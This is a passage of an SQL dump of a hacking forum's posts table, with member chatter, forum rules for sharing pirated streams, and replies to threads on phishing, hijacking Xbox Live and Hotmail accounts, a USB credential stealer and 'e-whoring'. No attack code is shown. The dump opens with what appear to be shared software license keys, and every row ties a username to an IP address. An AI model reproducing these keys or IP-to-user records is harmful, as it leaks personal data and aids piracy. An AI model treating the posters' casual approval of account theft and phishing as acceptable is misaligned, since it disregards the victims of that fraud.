N4WY8-DVW92-GM8WF-CG872-HH3G7 ND8P2-BD2PB-DD8HM-2926R-CRYQH RRYGR-8JNBY-V2RJ9-TJP4P-749T7 VHNT7-CPRFX-7FRVJ-T8GVM-8FDG7 [/code] That\'s it!', '72.231.24.165', '1223104677', '1', '0', '1', '1348976941', '1', '0a429ffc301966b1b2c98e400504a979', '0', '1348976941'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2935', '606', '0', '64', 'Forum Rules and Regulations', '0', '1', 't3h jok3r', '1348977158', 'This forum contains illegal viewing of movies and TV shows, so please make sure you follow the rules in this section. L33THacking is not responsible for what you post in this section. If any content in this section belongs to you and you would like it to be removed then PM any staff member of send a DMCA Take Down notice through the [url=http://l33thacking.net/contact.php]contact form[/url] [b]Rules[/b] - All links must be of online streaming, no downloads. - You must provide at least 4 links, a banner and movie description. - If 50% or more links are dead then the thread will be junked - By posting you agree that all the links you shared are found online and are NOT private and uploaded only for L33THacking. - No off site linking. Which means any outgoing link must be of streams and not of sites with the links. - It\'s OK if you do not provide credits to the uploader. - Off site links to pastebin are allowed. WE DO NOT ALLOW STREAMING ON PASTEBIN.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '266ecab14b77492becb16d554dad5601', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2616', '514', '2551', '9', 'RE: How to make serious money', '0', '9', 'p420', '1348679861', 'Nice method but when I click on buy now on the website, it opens the outlook mail program on my PC.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'c216e6c52983d367190a8b6bd43512c2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2617', '522', '2607', '16', 'RE: [Free][EBook] How to SE Starbucks', '0', '9', 'p420', '1348679993', 'Starbucks are easy, but thanks for the contribution.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '550f9888fd0bb7b0e7e4f6d835c16964', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2618', '524', '0', '63', 'Need signature', '0', '9', 'p420', '1348680037', 'I need a signature saying p420 please.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'f734d4930312b2516a2e8e6439d67385', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2619', '516', '2608', '29', 'RE: RBD\'s Xbox live Jacking Method', '0', '5', 'Timmy', '1348680124', '[quote=\'iTzIpod\' pid=\'2608\' dateline=\'1348618476\'] I don\'t need to use this method, I don\'t own a Xbox. Not planning on getting one too. Good luck everyone going to try this. [/quote] You can use it to hack hotmail accounts too.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '227e43dacff9d24f9a09cf0361bf5696', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2620', '464', '2192', '12', 'RE: [TUT] FUD USB Stealer by Anonymous Hackers', '0', '5', 'Timmy', '1348680507', 'Nice forensics tool. Thanks 4 the pictures.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'a79ab377f4b9fa3d98019bdb87440311', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2621', '525', '0', '30', 'Huge Dump of Ebooks', '0', '5', 'Timmy', '1348680913', '[img]http://puu.sh/13cAj.png[/img] [b]Download[/b] https://dl.dropbox.com/u/57903257/e-Books.zip Virus Scan not needed because this contains multiple files but here\'s a scan of the zip. https://www.virustotal.com/file/190085e20c6ccad6a9c98401be5295aa1ba7613dce2b613735ec9bb685fd88fa/analysis/1348680806/ False Detection!!!!', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '7a07a2ff7d49f7cb74e7a5ec26dcce34', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2622', '524', '2618', '63', 'RE: Need signature', '0', '62', 'R?????zo?', '1348687065', 'Since you are unique, please post here: http://l33thacking.net/thread-431-page-4.html I will be glad to help you :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '49027bb61405230d9ebb908167de6fb3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2623', '522', '2607', '16', 'RE: [Free][EBook] How to SE Starbucks', '0', '82', 'iTzIpod', '1348687140', 'No problem bro. Thanks for viewing my thread ;)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd4e6b02e97a04e09675d7206ad785a68', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2624', '431', '2594', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '62', 'R?????zo?', '1348687163', '[quote=\'iTzIpod\' pid=\'2594\' dateline=\'1348616976\'] Nice signature NXK ;) Still waiting for the Unique Userbars. Take your time like I said. Don\'t need to rush it. [/quote] My 2nd attemp: [img]http://i.imgur.com/ceRsZ.gif[/img] Sorry I know I said I would make a few. bit busy though but I will try tomorrow :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'bcd864f01c1c1725a25d29b706182f99', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2637', '526', '0', '3', 'New Smilies', '0', '1', 't3h jok3r', '1348708006', 'I\'m sure you guys noticed that I added a new set of smilies, so what are your guys thoughts? They are less but plan on adding some more.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b2f5cdb4b39642d92f51b3be747c80c5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2638', '526', '2637', '3', 'RE: New Smilies', '0', '194', 'Slender Man', '1348708520', 'I like the new smilies, there kinda cute LOL. ;)', '99.108.180.49', '1668068401', '1', '0', '0', '0', '1', 'd1f1a30688e2ed908886510ecf346799', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2626', '516', '2557', '29', 'RE: RBD\'s Xbox live Jacking Method', '0', '82', 'iTzIpod', '1348687243', '@Timmy, I have my own method of hacking hotmail accounts.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b2b95dfa156acb54f1135442828fd6ca', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2627', '525', '2621', '30', 'RE: Huge Dump of Ebooks', '0', '82', 'iTzIpod', '1348687288', 'Will check this out :D Thanks for the contribution!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3b9b5be847e6a80c783fd7237ea2867b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2628', '431', '2624', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '82', 'iTzIpod', '1348687357', '[quote=\'R?????zo?\' pid=\'2624\' dateline=\'1348687163\'] [quote=\'iTzIpod\' pid=\'2594\' dateline=\'1348616976\'] Nice signature NXK ;) Still waiting for the Unique Userbars. Take your time like I said. Don\'t need to rush it. [/quote] My 2nd attemp: [img]http://i.imgur.com/ceRsZ.gif[/img] Sorry I know I said I would make a few. bit busy though but I will try tomorrow :) [/quote] This is actually a good one. I love the font. What is it? I might use this. Unless I see your other userbars.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '20af64ba228208b0ef944cff6fdab33d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2629', '431', '2628', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '62', 'R?????zo?', '1348688677', '[quote=\'iTzIpod\' pid=\'2628\' dateline=\'1348687357\'] [quote=\'R?????zo?\' pid=\'2624\' dateline=\'1348687163\'] [quote=\'iTzIpod\' pid=\'2594\' dateline=\'1348616976\'] Nice signature NXK ;) Still waiting for the Unique Userbars. Take your time like I said. Don\'t need to rush it. [/quote] My 2nd attemp: [img]http://i.imgur.com/ceRsZ.gif[/img] Sorry I know I said I would make a few. bit busy though but I will try tomorrow :) [/quote] This is actually a good one. I love the font. What is it? I might use this. Unless I see your other userbars. [/quote] font is called FoughtKnight, you can download it here. http://www.dafont.com/foughtknight.font you want me to play with a few icons? is the text colour okay? if you liked this one I won\'t make others due being short on time.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '028a8f8382e0a9446ffb06e3ea779a65', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2630', '490', '2381', '49', 'RE: Forum Suggestion', '0', '62', 'R?????zo?', '1348689653', 'dont put gaming sections like that. think you should add it like FPS MMO\'s Strategy etc. if you will add every game to the list you are fucked :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'ccda075ba87d49d2910e5ec8794e0c13', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2631', '488', '2355', '8', 'RE: What are you listening to?', '0', '62', 'R?????zo?', '1348689855', 'http://www.youtube.com/watch?v=ySaWSxpb14g Artist: Nine Inch Nails Song: Meet Your Master (Le Pig Mix) fucking boss', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '0bede1c7a2c2866b3c7b78f31d0ac5c9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2632', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '82', 'iTzIpod', '1348690482', 'Font and Font color is ok. Might choose this one. Unless you make something better. Try playing with a few icons.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9e3432b79ddb079407accef39dcb8954', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2633', '351', '1651', '46', 'RE: Phishing Tutorial', '0', '2', 'Apathy', '1348690700', 'Nice tutorial I am thinking of trying this out.', '173.206.129.154', '-1378975334', '0', '0', '0', '0', '1', '0853fd1cd727ce6b8707e98d0ad0c669', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2634', '490', '2630', '49', 'RE: Forum Suggestion', '0', '1', 't3h jok3r', '1348690914', '[quote=\'R?????zo?\' pid=\'2630\' dateline=\'1348689653\'] dont put gaming sections like that. think you should add it like FPS MMO\'s Strategy etc. if you will add every game to the list you are fucked :P [/quote] True and how about gaming consoles and games?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '22475dc1e57305919532aea64060d2d1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2635', '490', '2381', '49', 'RE: Forum Suggestion', '0', '62', 'R?????zo?', '1348692042', 'add it like Consoles (PS3, XBOX, etc) Mobile and Tablet Gaming (iOS and Android)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '42dd8df9aa9c53b5bb63ea6f60374bfc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2639', '526', '2637', '3', 'RE: New Smilies', '0', '5', 'Timmy', '1348710103', 'I like the smilies too and can\'t wait for the other 1s.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '1b9aa4fe6284151905e367cfa33a2542', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2640', '526', '2637', '3', 'RE: New Smilies', '0', '82', 'iTzIpod', '1348710138', 'They\'re alright. Same ones from TP lol. :angel: [hr] Actually, they\'re better than the original. Even though there were less than before. Oh well. I prefer Quality over Quantity. :D Although a troll face and face palm smily would be nice. Face palm Troll face Epic face', '24.212.197.164', '416597412', '1', '0', '82', '1348710282', '1', 'ebf4b10cf2f6a3ae916bbb47958c1120', '0', '1348710158'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2641', '516', '2557', '29', 'RE: RBD\'s Xbox live Jacking Method', '0', '5', 'Timmy', '1348710203', 'Dude that\'s beast what does it include?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '4de962bc984c6d45f975f2a7d3f3fe7e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2642', '518', '2565', '7', 'RE: 2,500 Total Forum Posts', '0', '5', 'Timmy', '1348711462', 'I try to come on everyday and help LH because i know how important activity is for LH now.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '58914d33142fa2648b3e610b43bee616', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2643', '526', '2637', '3', 'RE: New Smilies', '0', '5', 'Timmy', '1348711702', 'Someone just added the roflol and devil icon. Seems cool', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '11f0254351c62b497a734be83cd644b9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2644', '526', '2637', '3', 'RE: New Smilies', '0', '82', 'iTzIpod', '1348711955', 'Just noticed that. Thanks for pointing it out :D I won\'t really use the evil icon that much though :evil: :P', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '14ec0741084194d9e0b4dcc219ae1621', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2645', '526', '2637', '3', 'RE: New Smilies', '0', '1', 't3h jok3r', '1348712062', 'Glad that people are liking the new emoticons.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'da9d60dd9e19e9823eda1b2541de736f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2646', '526', '2637', '3', 'RE: New Smilies', '0', '4', 'Triple H', '1348712234', 'Better than the old ones, less but better looking', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '9a0353e847b74d51d83c21353e2b6961', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2647', '494', '2406', '42', 'RE: Chinese Man Has Lived on Water Alone for the Last 12 Years', '0', '4', 'Triple H', '1348712278', 'Never underestimate a Chinese :) I still don\'t believe it though.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f3aed514980d9698c4d3059890908f11', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2648', '63', '149', '23', 'RE: [Guide] - Keylogger Information & Removal - [Guide]', '0', '4', 'Triple H', '1348712362', 'Best keylogger removal guide ever very helpful', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '6500426210c4a7cdd7f2b4b213ab446b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2649', '490', '2636', '49', 'RE: Forum Suggestion', '0', '4', 'Triple H', '1348712439', '[quote=\'t3h jok3r\' pid=\'2636\' dateline=\'1348707447\'] [quote=\'R?????zo?\' pid=\'2635\' dateline=\'1348692042\'] add it like Consoles (PS3, XBOX, etc) Mobile and Tablet Gaming (iOS and Android) [/quote] So sections like PS3, XBOX should be subforums? [/quote] No i say that you should make forums and not subforums', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '711e5438d0af7893dfb7389f4e0727be', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2650', '494', '2647', '42', 'RE: Chinese Man Has Lived on Water Alone for the Last 12 Years', '0', '82', 'iTzIpod', '1348712560', '[quote=\'Triple H\' pid=\'2647\' dateline=\'1348712278\'] Never underestimate a Chinese :) I still don\'t believe it though. [/quote] I know right? I don\'t believe it too. But after more research of this, dang. It\'s true. It\'s something you don\'t want to believe, but you kinda have too.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '79f37dc99d14d097ca7405011c76104f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2651', '63', '149', '23', 'RE: [Guide] - Keylogger Information & Removal - [Guide]', '0', '82', 'iTzIpod', '1348712613', 'Very nice guide. Very HQ and detailed. Thanks for the contribution.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '78e7bd64b771f1f65dd8cd1f95c011d1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2652', '527', '0', '47', 'Get my private free ebay items ebook and more', '0', '4', 'Triple H', '1348712689', 'Refer 2 members and and create 1 useful thread then PM me. [b]How to enter?[/b] Post below. Get free ebay items, $200 a day and free porn accounts ebook by winning this contest. [b]Duration[/b] 1 month [b]How many winners[/b] Unlimited- Everyone who completes the challenge get the ebooks the same day. [b]Notes[/b] - You have to post below then refer and post then PM me when you are done.', '72.231.24.165', '1223104677', '1', '0', '4', '1348795669', '1', 'fc7872ecba885856edfb1cb55ad78a5a', '0', '1348795669'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2653', '528', '0', '7', '[Milestone] Reached 700 posts', '0', '82', 'iTzIpod', '1348712742', 'Hey L33tHacking, Woot. I have just achieved 700 posts :D I don\'t think that\'s a lot compared to my other accounts on other forums. Other ones, I have like 5k posts -20k posts. :p Anyways, the point of this thread is basically just a milestone thread. It\'s just to inform everyone that I reached 700 posts. Thanks LH for everything. - iTzIpod', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '633c2fed9a5d93d9f9b42c8f918a7189', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2654', '510', '2540', '19', 'RE: Rbd\'s Skype Resolver Source', '0', '4', 'Triple H', '1348712776', 'Link is dead and someone remove this?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '0030b8e55dea93c84024339bf59771cf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2655', '528', '2653', '7', 'RE: [Milestone] Reached 700 posts', '0', '4', 'Triple H', '1348712863', 'And the best spammer award goes to [b]iTzIpod[/b] :D', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '7324eaea2a55a4e0cdbdea546059b9de', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2656', '527', '2652', '47', 'RE: Get my private free ebay items ebook and more', '0', '82', 'iTzIpod', '1348712893', 'How many winners can they be? Just 1? And once you win, can you leak it into other parts of the forum? Ex. Upgraded Section or Unique Section Etc? Also, the referrers have to be from the contest\'s duration? Not from before? Because I have 12 Referrers and also I created a lot of threads. Some were useful. Some where informational, etc. But if not, I\'ll try to referr more members. And create more useful threads.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3a158419b0bb49bba82927376e1b03ac', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2657', '528', '2653', '7', 'RE: [Milestone] Reached 700 posts', '0', '82', 'iTzIpod', '1348712958', 'Thanks Triple H, the King of Kings. ;) I bet you can whoop Sin Cara\'s ass. :p Although, a match like that seems interesting. Triple H vs. Sin Cara?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '621f9cf3164832d5e385ba0bc39e1b06', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2658', '510', '2540', '19', '[Junk]Rbd\'s Skype Resolver Source', '0', '1', 't3h jok3r', '1348712993', 'This thread has been junked.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2659', '502', '2458', '61', 'RE: Ultimate E-Whoring guide', '0', '82', 'iTzIpod', '1348713334', 'Thanks very much for contributing to Unique as promised. Keep it up! :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1fd5d635ed8cf3f68499f4b6e13955c6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2660', '529', '0', '49', '[Suggestion] A or B Section', '0', '82', 'iTzIpod', '1348713831', 'This section is a debate section. It\'s in the Off Topic/Lounge Section of course. It\'s a sub forum. And it contains threads like: Coke or Pepsi Boy or Girl Weak or Strong Rich or Poor Etc And the threads must contain a poll containing the options. Etc? This can boost a lot of L33tHacking \'s activity. Because we can make a lot of threads. And a lot of posts this way :D Approve? Decline? Discuss.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '170207eea998339ba47a17872b9b17f0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2661', '529', '2660', '49', 'RE: [Suggestion] A or B Section', '0', '1', 't3h jok3r', '1348714035', 'Nice idea but we don\'t have enough active members to support the section daily. I believe the off topic section is perfect for such discussions at the moment.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'd6fec80fd8f0d359a1f1a228ae279d2e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2662', '528', '2653', 